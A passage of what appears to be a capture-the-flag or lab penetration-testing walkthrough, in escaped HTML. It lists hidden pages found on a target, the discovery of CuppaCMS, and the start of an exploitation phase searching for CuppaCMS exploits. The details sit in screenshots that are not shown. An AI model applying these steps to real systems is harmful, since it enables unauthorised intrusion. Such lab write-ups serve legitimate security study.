medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- So we get knowledge of webpages&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;b&gt;developmentsecretpage,&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;b&gt;devops&lt;/b&gt;, &lt;b&gt;genevieve&lt;/b&gt; and also &lt;b&gt;directortestpagev1.php&lt;/b&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwccpxRoBjqlUxVv0mUsKk0JvrQQWmQMMDDKBaj4xK7mFvmCchA90noZiPB-AMtoIEHb0dUQFGckHzx28EVEP4hqrK4idRgW5Dw4H90YorewF_wU0Ku9qtkI4DxkWw3J4R0x0JRZ-CqKkU/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;565&quot; data-original-width=&quot;622&quot; height=&quot;581&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwccpxRoBjqlUxVv0mUsKk0JvrQQWmQMMDDKBaj4xK7mFvmCchA90noZiPB-AMtoIEHb0dUQFGckHzx28EVEP4hqrK4idRgW5Dw4H90YorewF_wU0Ku9qtkI4DxkWw3J4R0x0JRZ-CqKkU/w640-h581/screenshot.27.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJwDwKBtOiPJvvR3dwIl4oOwsxRZpQR0v6zpnQZlLA2HTvyNJY_WR6j-qT1YPM8a3EQX4nvXxiFVsFWHkw3bbBzsKwTVYOgQ2yzxkL3loz4vnXTmptbsTHkHS_pudQz_jF4D9CDFJuIQqA/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;196&quot; data-original-width=&quot;622&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJwDwKBtOiPJvvR3dwIl4oOwsxRZpQR0v6zpnQZlLA2HTvyNJY_WR6j-qT1YPM8a3EQX4nvXxiFVsFWHkw3bbBzsKwTVYOgQ2yzxkL3loz4vnXTmptbsTHkHS_pudQz_jF4D9CDFJuIQqA/s16000/screenshot.28.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHLk0k3rysv7sNV9L6U805HljepZ8fNH8CNbPYacceXMvxEbUp4tL4ziT0GPW0Vos0AOCI2hhPzzTB-PfUFRmN68uj9ZevzIWjtf_E_eStrMIVvXi9VRmlyFDCvD3DNfQpcFw7tFCz7BUL/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;482&quot; data-original-width=&quot;749&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHLk0k3rysv7sNV9L6U805HljepZ8fNH8CNbPYacceXMvxEbUp4tL4ziT0GPW0Vos0AOCI2hhPzzTB-PfUFRmN68uj9ZevzIWjtf_E_eStrMIVvXi9VRmlyFDCvD3DNfQpcFw7tFCz7BUL/s16000/screenshot.29.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Clicking tabs &lt;b&gt;Internal Use Only -&amp;gt; Knowledge Management&lt;/b&gt; we discover&lt;/span&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: arial; font-size: large;&quot;&gt;CuppaCMS&lt;/b&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuJr83hyphenhyphenwaJT49ArpA3e6G5wV16T5FqTp7swxGhelV0MJgj2v-fyGnvVw9bu0wCo4JM98PhtdVlbz0MOD7jDbZTxD61GJDH4F4djOfmutx4r2s0VPlEIOCHsD0IPpBUo4mxM7HBf72Jkko/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;598&quot; data-original-width=&quot;623&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuJr83hyphenhyphenwaJT49ArpA3e6G5wV16T5FqTp7swxGhelV0MJgj2v-fyGnvVw9bu0wCo4JM98PhtdVlbz0MOD7jDbZTxD61GJDH4F4djOfmutx4r2s0VPlEIOCHsD0IPpBUo4mxM7HBf72Jkko/s16000/screenshot.30.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;3 - EXPLOITATION&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for exploits related to &lt;b&gt;CuppaCMS&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN-hOEiauWOvC1drSDsDLu-akK1QkLRyTTe6ZbPMGgxwHaDy2-mhS1_IvqV9V0Usdjq9_7JxqeISMrw2mne_mGR-Cz5DO9WDd35lYgyQRP5n8BaWQiSAwsRgjWLyiz_o2PPLqJsK3pXk4u/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;158&quot; data-original-width=&quot;747&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN-hOEiauWOvC1drSDsDLu-akK1QkLRyTTe6ZbPMGgxwHaDy2-mhS1_IvqV9V0Usdjq9_7JxqeISMrw2mne_mGR-Cz5DO9WDd35lYgyQRP5n8BaWQiSAwsRgjWLyiz_o2PPLqJsK3pXk4u/s16000/screenshot.31.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtRt3AT46IBtJEh_xf8hg980mfJ2MLPTZOTLU1Cs_4e-WG6aM7YVvZRs18VcXqKGEKhqaEVA_osfdB0FfC_z7di535XOEvvF3DxsucvPCrkn53eoyAa_SC7O1wTKYZGRr09d2d_3nJd1bU/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;145&quot; data-original-width=&quot;389&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtRt3AT46IBtJEh_xf8hg980mfJ2MLPTZOTLU1Cs_4e-WG6aM7YVvZRs18VcXqKGEKhqaEVA_osfdB0FfC_z7di535XOEvvF3DxsucvPCrkn53eoyAa_SC7O1wTKYZGRr09d2d_3nJd1bU/s16000/screenshot.32.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh56VfMa8UzQZ8mx_5W5KkV_eIeIZk41_MjEYpQhPl1be4_7A1kQIr4GyyId8ioU1bt2zCw8cvtFai7uEvXSM9zVU5HQyEuOEsnZubvAWZF8-NdllhyT-aK1HvHKbsYaPYbbYM8tx8U5lMC/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;738&quot; data-original-width=&quot;939&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh56VfMa8UzQZ8mx_5W5KkV_eIeIZk41_MjEYpQhPl1be4_7A1kQIr4GyyId8ioU1bt2zCw8cvtFai7uEvXSM9zVU5HQyEuOEsnZubvAWZF8-NdllhyT-aK1HvHKbsYaPYbbYM8tx8U5lMC/s16000/screenshot.33.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span 